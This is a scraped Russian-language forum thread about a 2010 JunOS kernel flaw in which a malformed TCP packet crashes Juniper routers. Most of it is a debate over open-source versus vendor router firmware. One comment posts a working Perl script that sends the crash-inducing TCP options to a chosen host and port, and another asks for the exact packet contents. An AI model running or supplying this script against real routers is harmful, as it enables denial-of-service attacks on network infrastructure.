https://www.opennet.ru/openforum/vsluhforumID3/62746.html Компания Juniper Networks объявила (http://praetorianprefect.com/archives/2010/01/junos-juniper-flaw-exposes-core-routers-to-kernal-crash/) об обнаружении уязвимости в ядре операционной системы JunOS, под которой работают большинство маршрутизаторов Juniper. Посылка специально сформированного TCP пакета (с неправильно оформленной заглавной частью) на открытый порт самого маршрутизатора вызывает крах ядра, ведущий за собой рестарт устройства. Встроенный межсетевой экран не в состоянии "поймать" и изолировать такой пакет. <br><br><br>Проблеме подвержены почти все версии JunOS, начиная с 5.3.5 p0-2 и заканчивая 9.0R1.1 (полныю список приводится здесь (http://www.securityfocus.com/bid/37670)). По словам Juniper Networks, проблема обнаружена самой компанией во время проверки на совместимость с оборудованием других производителей. Подробностей по поводу того каким образом должен быть сформирован пакет не сообщается. По неофициальным данным, обновление будет доступно в понедельник, 11 января. <br><br><br>URL: http://praetorianpref https://www.opennet.ru/openforum/vsluhforumID3/62746.html#33 Tue, 19 Jan 2010 05:38:55 GMT &gt;&gt;ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет? <br>&gt;<br>&gt;Как <br>&gt;<br><br>как заслуженна? еще раз отрывок из коммента выше напомнить? :) <br><br>&gt;&gt;опять же - никакая лицензия не заставит выпустить производителя<br>&gt;&gt;выпускать обновления быстро. <br>&gt;<br>&gt;Да, вот только для длинков и асусов всяких, с их GPL - <br>&gt;желающие сами могут запатчить большинство ляпов. Посему те кто не хочет <br>&gt;быть рассадником ботов, глюков, багв и делать вендору годами минет в <br>&gt;надежде что все это может быть починят (а может быть и <br>&gt;нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я <br>&gt;не понимаю какого хрена у них за их бабки этого шанса <br>&gt;быть не должно. <br><br>то устройство, на которое я ссылался, тоже на линухе с gpl. и? <br><br>&gt;&gt;то есть в данном случае я не вижу связи между сообществом <br>&gt;&gt;freeBSD и выпуском джунипером обновлений. <br>&gt;<br>&gt;Именно. Между сообществом и вендором связи никакой. И на самом деле это <br>&gt;- dead way. Коллаборативная работа над проблемой - заруливает растаскивание по <br>&gt;углам с https://www.opennet.ru/openforum/vsluhforumID3/62746.html#32 Tue, 19 Jan 2010 05:19:08 GMT &gt;&gt;<br>&gt;&gt;идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока <br>&gt;&gt;почему то не удалось сделать свою. <br>&gt;&gt;<br>&gt;&gt;http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не <br>&gt;&gt;наблюдается. <br>&gt;&gt;<br>&gt;<br>&gt;а оно надо этому девайсу? <br>&gt;с вайфаем -- была острая необходимость. здесь то что? <br><br>а здесь - потрясающе низкая скорость работы сетевого накопителя. <br><br> https://www.opennet.ru/openforum/vsluhforumID3/62746.html#31 Mon, 18 Jan 2010 15:42:05 GMT &gt;Так покопайтесь с Time Capsule - внутри 100% Marvell <br><br>Это чего-то яббловское как я понял? От продукции яббла я предпочитаю держаться подальше, слишком уж противный и ограничительный вендор, даже хуже MS имхо, т.к. задранные цены + в их железках всегда найдется какая-то пакость которая отравит удовольствие от обладания девайсом. Да и если у вас нет мака (а мне и без него хорошо) - яббловские железки обычно не слишком ориентированы на всех остальных. Вот если несколько более-менее нейтральных вендоров начнут юзать платформу для роутеров, я к ней присмотрюсь, факт.<br><br>P.S. а вообще, честное пионерское, мне есть с чем поковыряться в свое удовольствие и я в состоянии выбрать себе предметы ковыряния сам. Без всяких ябблов на горизонте. <br> https://www.opennet.ru/openforum/vsluhforumID3/62746.html#30 Mon, 18 Jan 2010 15:30:36 GMT &gt;ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет? <br><br>Как <br><br>&gt;опять же - никакая лицензия не заставит выпустить производителя<br>&gt;выпускать обновления быстро. <br><br>Да, вот только для длинков и асусов всяких, с их GPL - желающие сами могут запатчить большинство ляпов. Посему те кто не хочет быть рассадником ботов, глюков, багв и делать вендору годами минет в надежде что все это может быть починят (а может быть и нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я не понимаю какого хрена у них за их бабки этого шанса быть не должно.<br><br>&gt;то есть в данном случае я не вижу связи между сообществом <br>&gt;freeBSD и выпуском джунипером обновлений. <br><br>Именно. Между сообществом и вендором связи никакой. И на самом деле это - dead way. Коллаборативная работа над проблемой - заруливает растаскивание по углам с большим отрывом. <br><br>&gt;так же, например, как между длинком, выпускающем soho-роутеры на линухе, <br>&gt;и боте-нете на оных и собственно самим линухом. <br><br>В случае линуха - если мн https://www.opennet.ru/openforum/vsluhforumID3/62746.html#29 Mon, 18 Jan 2010 14:57:28 GMT &gt;<br>&gt;идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока <br>&gt;почему то не удалось сделать свою. <br>&gt;<br>&gt;http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не <br>&gt;наблюдается. <br>&gt;<br><br>а оно надо этому девайсу?<br>с вайфаем -- была острая необходимость. здесь то что?<br> https://www.opennet.ru/openforum/vsluhforumID3/62746.html#28 Fri, 15 Jan 2010 05:29:04 GMT йо. ваше маниакальное стремление пересадить всех на опенсорц напоминает РМС. хотите использовать в ядре сети железку с прошивкой "от олега" - ваше дурное право. но пропагандировать свою дурь это уж через чур. да, кстати. сетевые железки - большой бизнес. а в бизнесе не будет ничего открытого, ибо конкуренция и коммерческая тайна.<br> https://www.opennet.ru/openforum/vsluhforumID3/62746.html#27 Mon, 11 Jan 2010 11:27:19 GMT #!/usr/bin/perl<br><br>my $host = shift;<br>my $port = shift;<br><br>use Net::Packet qw($Env);<br><br>use Net::Packet::IPv4;<br>my $ip = Net::Packet::IPv4-&gt;new(dst =&gt; $host);<br><br>use Net::Packet::TCP;<br><br>my $tcp = Net::Packet::TCP-&gt;new(<br>dst =&gt; $port,<br>options =&gt; "\x65\x02\x01\x01",<br>);<br><br>use Net::Packet::Frame;<br>my $frame = Net::Packet::Frame-&gt;new(l3 =&gt; $ip, l4 =&gt; $tcp);<br><br>$frame-&gt;send;<br>exit 0;<br> https://www.opennet.ru/openforum/vsluhforumID3/62746.html#25 Mon, 11 Jan 2010 05:55:24 GMT Если не сложно можно связаться с Вами для уточнения содержимого пакета, так как подбор не помог и Жунипер не отреагировал, встает вопрос версия не восприимчива или просто не правильно сформирован пакет?<br> https://www.opennet.ru/openforum/vsluhforumID3/62746.html#24 Mon, 11 Jan 2010 04:11:32 GMT Ясно. Тогда я не оценил масштабов трагедии.<br>